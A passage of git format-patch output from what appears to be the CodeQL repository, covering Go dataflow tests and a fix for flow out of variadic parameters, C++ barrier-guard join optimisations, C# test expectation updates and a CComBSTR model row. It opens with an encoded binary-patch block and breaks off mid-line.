z9t-GPyECR7p#sjn+qs{Puvo;pbmtPzp{oc+x3c(R4a$`}b8APgpvb*N4xVfKqfwHD zuT&eM0LU8Emb_q3CexCxR_&bR?{H^itJX5m4ncT4&SvvW8_9Y5Mx9EvZU*%i^9fx| z>dWoiy~t)~y?vN+P~Bjc7W7|;T0^=!xt%Hsi~$;MTFpOq*}3@dx6S`v-Hf>l~l@IB65JFxD{I;nAYgH?@jK6u)}h0N*zWEC^R8x zS@&Le$fyIZ7YsWl$xyB~m`@G?qeGxw>79+DDl>rq#FK%bzq2UqcAlVsHLgyd&o5la z-}h}JWNrflMyK;pbAdCcZhz;F6W)*171kIt>)&7r2_3nk6S#6l@)vTF{I&+vk6E4L zs#X{dYlJq#v#$vv0$c1uqEfLfzT!2$B}$Kb)(${Uj7XOjjl7Wi>Jtm38i zN)r$#I^Ym6H*==SWd~RjA;cG3@rVr5mC_`=SXLfidFj*541Yonm&-~^f*dmZ2{}P` zdQsA#UcEG~T~_W_WRSGnj^jNpHcBehkd5OdEHEtJSA*{1l0Ja!Ok7!d_l0qHVXw;v%|u0Qn&-UE(kyI6=|^ka5$)=woL}8*Dt2hg7=aEU0&;_LddjS z4G8MUBi}P4QuJM^F35vK7j=7MAIf1m0>aTat}HJsA|q7al;pk1w|L7{zl{OSNZr`b zvNY}$5++j~njlxVL~v@Y9zPzkOU>9L zKBIoSiyeG?JW3^j@$Q2SfS@1oGbk?-!Ih^@K$=3<7y5IATyptvZ{2GmDD!oPX=vGP z<`H@FR$pErVifuTxVJB#4rpiIEG3Bh2l~zyAny2da=A$t2&(&hZG0YC{u)(WH30~V z*8*{3t>Ey|^*P=aMto6DAteYDDPbXbW#!4G{8Ebd7ZG#5n+fuB76kXG--v9itHiy) zB0ocJ?`L#Dw-oOQMM=NHzM!d0xD$Z=TfbT&Y=Xt@M|HRupvuFH3pZwzhRh^De;0+A z^ZgL=o*ZDqYPIr^ykM)<7g%`x*>5UX-_w;e-P|7UIQ!3?^|{+aQF_ovLu}4Sz!vX+ z`w5Wsed({h;tvaG&xbfPoY$y(sE_6D1{v0y0#B5iXURZ&a!>yV1gp*lPPzvi9FM+5 z@Sg1Ir^;<99pGaVfx3T1ev#o(W3|bl|DWpqnqhEl%mmm!00A`Ec!WHYn8L=O&6XyN=*mK(UCFm%`dsb)feqCxTBarm+- zVgq5+1eoa*H*=({^_KJ0G=c!bf+k%!R59Y%M4}?{zWHMHdm$|s(5VrqgDcT6Vj-QD zCH*i)nGx2W_w)_7U**dWJ)p2?obKxlSk#3-;7P(?65;KC6AGqbI8ju9S!`n*`0gT2Mq`DfiAOh zN0oGg!@{(o?KzYtdMAZc1W10%^3#4{L8){Yad@nN{*T|@m=;1;xkhHJ8EatHiwKoQ zf9M`QJ~Ye>V%@ydm%3T#ipiVD40G8RVb1w!DmH_gr$;>V z?=BWIQ!>0%*YOcQJ#x{b)wt427pNL@JU3|;$a6R3e?=EHQP$>w^L}u2`!j&c+oZc8 z4%YE+*7)sWrVM}0#xc;GT$-?mcJ=Wqi$piFU8xx|fXA*?Iu60@cb#b>$R8e&7%8_d zHQM%mH-F)=5ne=si+vt&xUuxrTKVa}Fqeg>qMxCbt2Ix&b(zLaYm}d-K^MehoX8(l zRa3!yXEk!+7wn^~W5?~X5{3KnTrT<8TVkR=iB0fQ z@5#Qw?Ht#}TlfH?Pj?&su*%|Rg>1YCq*6AeR(CecSTy6}@P#ll5lb(Rkqt2e*l}*g zkHq&OOWt*fq6W%p?f6S$_`VATx8@?q)U>b+7x?{KB~yt&SZx6K{HL(zs0bpoC_*Q3 z3MWq#-MnY`!>!+o@e-zKoE@k4+f)G%cgRRXMqv!vWH!p#i8f^OPl?+U^bv7!b;5c# z+1!^Uthnoyvk<^P5SVDK>raf{01#36_oj~YkC-8rEaxtD7 z5X{INj{qT$L)<2q7SugY1}C3<$BN1g{}t-vro!8?^8b_U>&bt=`rH3Z6(9%jB>Z_h z#W7KF)9++>-+GC>Sa@(`o^bQPm1FgH=#+?&2}@J-qp5KdL9CU968A;_4LV(o-8d?w zo(x@}X3<+h3ru+$OqxjcL%5C*;k+`mAm?zsSwe@yHIfoCdYMnXR4POkqC(R<+A$?O zB_89V{_{CHRSgU%ykYk9|NcCVea^o#^&ivE>SsAhe*QoFozSfeBL2Y(rTDv`JX{%I z=5&*v^ry({Gx)QZa2@jRYmTqMGWv&K!(TaoWAtH*i&%Auz?4i^{-r};hg?g9V+ From 96c8af89433b0054f14bff982cb5215a8dd31010 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 13:04:19 +0000 Subject: [PATCH 0892/1267] Test flow out of varargs param with function models --- .../semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql | 3 +++ .../semmle/go/dataflow/VarArgsWithFunctionModels/go.mod | 2 +- .../semmle/go/dataflow/VarArgsWithFunctionModels/main.go | 8 +++++++- .../vendor/github.com/nonexistent/test/stub.go | 2 ++ 4 files changed, 13 insertions(+), 2 deletions(-) diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql index 80f711e3312..22da81845c0 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql @@ -19,6 +19,9 @@ class SummaryModelTest extends DataFlow::FunctionModel { this.hasQualifiedName("github.com/nonexistent/test", "FunctionWithVarArgsParameter") and (inp.isParameter(_) and outp.isResult()) or + this.hasQualifiedName("github.com/nonexistent/test", "FunctionWithVarArgsOutParameter") and + (inp.isParameter(0) and outp.isParameter(any(int i | i >= 1))) + or this.hasQualifiedName("github.com/nonexistent/test", "FunctionWithSliceOfStructsParameter") and (inp.isParameter(0) and outp.isResult()) or diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod index ed18764ed28..cdb11f2ee6c 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod @@ -1,5 +1,5 @@ module semmle.go.Packages -go 1.17 +go 1.23 require github.com/nonexistent/test v0.0.0-20200203000000-0000000000000 diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go index f7248f1f6a2..e8d53eb9b28 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go @@ -8,7 +8,7 @@ func source() string { return "untrusted data" } -func sink(string) { +func sink(any) { } func main() { @@ -27,6 +27,12 @@ func main() { randomFunctionWithMoreThanOneParameter(1, 2, 3, 4, 5) // This is needed to make the next line pass, because we need to have seen a call to a function with at least 2 parameters for ParameterInput to exist with index 1. sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to FunctionWithVarArgsParameter" + var out1 *string + var out2 *string + test.FunctionWithVarArgsOutParameter(source(), out1, out2) + sink(out1) // $ hasValueFlow="out1" + sink(out2) // $ hasValueFlow="out2" + sliceOfStructs := []test.A{{Field: source()}} sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field" diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go index 66f3da7d659..b3e407fcaa7 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go @@ -15,6 +15,8 @@ func FunctionWithSliceParameter(s []string) string { func FunctionWithVarArgsParameter(s ...string) string { return "" } +func FunctionWithVarArgsOutParameter(in string, out ...*string) { +} func FunctionWithSliceOfStructsParameter(s []A) string { return "" From 8cc4cd58c6e8e68bebb283146d6a723cc89b468f Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 13:41:10 +0000 Subject: [PATCH 0893/1267] Add failing test for flow out of varargs param with models-as-data --- .../VarArgsWithExternalFlow/Flows.expected | 2 + .../VarArgsWithExternalFlow/Flows.ext.yml | 21 ++++++++ .../dataflow/VarArgsWithExternalFlow/Flows.ql | 22 ++++++++ .../dataflow/VarArgsWithExternalFlow/go.mod | 5 ++ .../dataflow/VarArgsWithExternalFlow/main.go | 51 +++++++++++++++++++ .../github.com/nonexistent/test/stub.go | 31 +++++++++++ .../vendor/modules.txt | 3 ++ 7 files changed, 135 insertions(+) create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected new file mode 100644 index 00000000000..55e9aed2e93 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected @@ -0,0 +1,2 @@ +testFailures +invalidModelRow diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml new file mode 100644 index 00000000000..ca3f9559536 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml @@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: + - ["github.com/nonexistent/test", "", False, "FunctionWithParameter", "", "", "Argument[0]", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithSliceParameter", "", "", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsParameter", "", "", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsOutParameter", "", "", "Argument[0]", "Argument[1].ArrayElement", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithSliceOfStructsParameter", "", "", "Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field]", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsOfStructsParameter", "", "", "Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field]", "ReturnValue", "value", "manual"] + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["github.com/nonexistent/test", "", False, "VariadicSource", "", "", "Argument[0]", "qltest", "manual"] + - addsTo: + pack: codeql/go-all + extensible: sinkModel + data: + - ["github.com/nonexistent/test", "", False, "VariadicSink", "", "", "Argument[0]", "qltest", "manual"] diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql new file mode 100644 index 00000000000..0f0b9dbe22d --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql @@ -0,0 +1,22 @@ +import go +import semmle.go.dataflow.ExternalFlow +import ModelValidation +import TestUtilities.InlineFlowTest + +module Config implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + sourceNode(source, "qltest") + or + exists(Function fn | fn.hasQualifiedName(_, ["source", "taint"]) | + source = fn.getACall().getResult() + ) + } + + predicate isSink(DataFlow::Node sink) { + sinkNode(sink, "qltest") + or + exists(Function fn | fn.hasQualifiedName(_, "sink") | sink = fn.getACall().getAnArgument()) + } +} + +import FlowTest diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod new file mode 100644 index 00000000000..cdb11f2ee6c --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod @@ -0,0 +1,5 @@ +module semmle.go.Packages + +go 1.23 + +require github.com/nonexistent/test v0.0.0-20200203000000-0000000000000 diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go new file mode 100644 index 00000000000..324864edd22 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go @@ -0,0 +1,51 @@ +package main + +import ( + "github.com/nonexistent/test" +) + +func source() string { + return "untrusted data" +} + +func sink(any) { +} + +func main() { + s := source() + sink(test.FunctionWithParameter(s)) // $ hasValueFlow="call to FunctionWithParameter" + + stringSlice := []string{source()} + sink(stringSlice[0]) // $ hasValueFlow="index expression" + + s0 := "" + s1 := source() + sSlice := []string{s0, s1} + sink(test.FunctionWithParameter(sSlice[1])) // $ hasValueFlow="call to FunctionWithParameter" + sink(test.FunctionWithSliceParameter(sSlice)) // $ hasValueFlow="call to FunctionWithSliceParameter" + sink(test.FunctionWithVarArgsParameter(sSlice...)) // $ hasValueFlow="call to FunctionWithVarArgsParameter" + sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to FunctionWithVarArgsParameter" + + var out1 *string + var out2 *string + test.FunctionWithVarArgsOutParameter(source(), out1, out2) + sink(out1) // $ MISSING: hasValueFlow="out1" + sink(out2) // $ MISSING: hasValueFlow="out2" + + sliceOfStructs := []test.A{{Field: source()}} + sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field" + + a0 := test.A{Field: ""} + a1 := test.A{Field: source()} + aSlice := []test.A{a0, a1} + sink(test.FunctionWithSliceOfStructsParameter(aSlice)) // $ hasValueFlow="call to FunctionWithSliceOfStructsParameter" + sink(test.FunctionWithVarArgsOfStructsParameter(aSlice...)) // $ hasValueFlow="call to FunctionWithVarArgsOfStructsParameter" + sink(test.FunctionWithVarArgsOfStructsParameter(a0, a1)) // $ hasValueFlow="call to FunctionWithVarArgsOfStructsParameter" + + var variadicSource string + test.VariadicSource(&variadicSource) + sink(variadicSource) // $ MISSING: hasTaintFlow="variadicSource" + + test.VariadicSink(source()) // $ hasTaintFlow="[]type{args}" + +} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go new file mode 100644 index 00000000000..f23bc1d0481 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go @@ -0,0 +1,31 @@ +package test + +type A struct { + Field string +} + +func FunctionWithParameter(s string) string { + return "" +} + +func FunctionWithSliceParameter(s []string) string { + return "" +} + +func FunctionWithVarArgsParameter(s ...string) string { + return "" +} +func FunctionWithVarArgsOutParameter(in string, out ...*string) { +} + +func FunctionWithSliceOfStructsParameter(s []A) string { + return "" +} + +func FunctionWithVarArgsOfStructsParameter(s ...A) string { + return "" +} + +func VariadicSource(s ...*string) {} + +func VariadicSink(s ...string) {} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt new file mode 100644 index 00000000000..b62dbf8819b --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt @@ -0,0 +1,3 @@ +# github.com/nonexistent/test v0.0.0-20200203000000-0000000000000 +## explicit +github.com/nonexistent/test From 67572712ea53c27657abf0f5b34176a901910489 Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 14:54:23 +0000 Subject: [PATCH 0894/1267] Fix flow out of varargs param with models-as-data This still doesn't allow for a variadic out parameter to be defined as a source using MaD. This is due to the lack of an implicit store step at sources, to match implicit read steps at sinks. --- go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll | 5 +++++ go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll | 3 +++ .../semmle/go/dataflow/VarArgsWithExternalFlow/main.go | 4 ++-- 3 files changed, 10 insertions(+), 2 deletions(-) diff --git a/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll b/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll index 9f07693b7ea..bbef53935ad 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll @@ -66,6 +66,11 @@ predicate containerReadStep(Node node1, Node node2, Content c) { ( node2.(Read).readsElement(node1, _) or + exists(ImplicitVarargsSlice ivs | + node1.(PostUpdateNode).getPreUpdateNode() = ivs and + node2.(PostUpdateNode).getPreUpdateNode() = ivs.getCallNode().getAnImplicitVarargsArgument() + ) + or node2.(RangeElementNode).getBase() = node1 or // To model data flow from array elements of the base of a `SliceNode` to diff --git a/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll b/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll index cc353ab64df..05283454cff 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll @@ -845,6 +845,9 @@ module Public { or preupd = getAWrittenNode() or + preupd instanceof ImplicitVarargsSlice and + mutableType(preupd.(ImplicitVarargsSlice).getType().(SliceType).getElementType()) + or preupd = any(ArgumentNode arg).getACorrespondingSyntacticArgument() and mutableType(preupd.getType()) ) and diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go index 324864edd22..f90f429b12a 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go @@ -29,8 +29,8 @@ func main() { var out1 *string var out2 *string test.FunctionWithVarArgsOutParameter(source(), out1, out2) - sink(out1) // $ MISSING: hasValueFlow="out1" - sink(out2) // $ MISSING: hasValueFlow="out2" + sink(out1) // $ hasValueFlow="out1" + sink(out2) // $ hasValueFlow="out2" sliceOfStructs := []test.A{{Field: source()}} sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field" From 75331ea2689b34a3965a1c63ca65a8b47be0488d Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 15:03:34 +0000 Subject: [PATCH 0895/1267] Add change note --- .../2024-12-06-improve-flow-out-of-variadic-parameter.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md diff --git a/go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md b/go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md new file mode 100644 index 00000000000..8244ba06994 --- /dev/null +++ b/go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Data flow out of variadic parameters now works in more situations. Summary models defined using models-as-data work. Source models defined using models-as-data do not work yet. From c51153203b42d679f86f3472dd374c9b681ce7d8 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 13:48:47 +0000 Subject: [PATCH 0896/1267] C++: Fix two bad joins that happen in 'UnboundedWrite' on #18207. --- .../cpp/ir/dataflow/internal/DataFlowUtil.qll | 29 +++++++++++++------ .../cpp/ir/dataflow/internal/SsaInternals.qll | 1 + 2 files changed, 21 insertions(+), 9 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll index d0935bb76d2..32dec1355ea 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll @@ -2275,6 +2275,12 @@ private predicate guardControlsPhiInput( */ signature predicate guardChecksSig(IRGuardCondition g, Expr e, boolean branch); +bindingset[g, n] +pragma[inline_late] +private predicate controls(IRGuardCondition g, Node n, boolean edge) { + g.controls(n.getBasicBlock(), edge) +} + /** * Provides a set of barrier nodes for a guard that validates an expression. * @@ -2318,15 +2324,17 @@ module BarrierGuard { exists(IRGuardCondition g, Expr e, ValueNumber value, boolean edge | e = value.getAnInstruction().getConvertedResultExpression() and result.asConvertedExpr() = e and - guardChecks(g, value.getAnInstruction().getConvertedResultExpression(), edge) and - g.controls(result.getBasicBlock(), edge) + guardChecks(g, + pragma[only_bind_into](value.getAnInstruction().getConvertedResultExpression()), edge) and + controls(g, result, edge) ) or exists( IRGuardCondition g, boolean branch, Ssa::DefinitionExt def, IRBlock input, Ssa::PhiNode phi | guardChecks(g, def.getARead().asOperand().getDef().getConvertedResultExpression(), branch) and - guardControlsPhiInput(g, branch, def, input, phi) and + guardControlsPhiInput(g, branch, def, pragma[only_bind_into](input), + pragma[only_bind_into](phi)) and result = TSsaPhiInputNode(phi, input) ) } @@ -2404,8 +2412,9 @@ module BarrierGuard { exists(IRGuardCondition g, Expr e, ValueNumber value, boolean edge | e = value.getAnInstruction().getConvertedResultExpression() and result.asIndirectConvertedExpr(indirectionIndex) = e and - guardChecks(g, value.getAnInstruction().getConvertedResultExpression(), edge) and - g.controls(result.getBasicBlock(), edge) + guardChecks(g, + pragma[only_bind_into](value.getAnInstruction().getConvertedResultExpression()), edge) and + controls(g, result, edge) ) or exists( @@ -2414,7 +2423,8 @@ module BarrierGuard { guardChecks(g, def.getARead().asIndirectOperand(indirectionIndex).getDef().getConvertedResultExpression(), branch) and - guardControlsPhiInput(g, branch, def, input, phi) and + guardControlsPhiInput(g, branch, def, pragma[only_bind_into](input), + pragma[only_bind_into](phi)) and result = TSsaPhiInputNode(phi, input) ) } @@ -2443,17 +2453,18 @@ module InstructionBarrierGuard Date: Fri, 6 Dec 2024 15:18:03 +0000 Subject: [PATCH 0897/1267] C#: Accept test changes. --- .../test/library-tests/dataflow/library/FlowSummaries.expected | 2 +- .../dataflow/library/FlowSummariesFiltered.expected | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected index 25e4a9317eb..a7c87af0bfe 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected @@ -1513,7 +1513,7 @@ summary | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | -| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected index 4d315854b67..1d6443748b8 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected @@ -562,7 +562,7 @@ | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | -| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | From d0bf3b84e4c263789324ae4f8cb33ca70fedb009 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:27:17 +0000 Subject: [PATCH 0898/1267] C++: Add missing MaD row for move constructor. --- cpp/ql/lib/ext/CComBSTR.model.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index b578956edec..0cbf021a8a9 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -8,6 +8,7 @@ extensions: - ["", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", 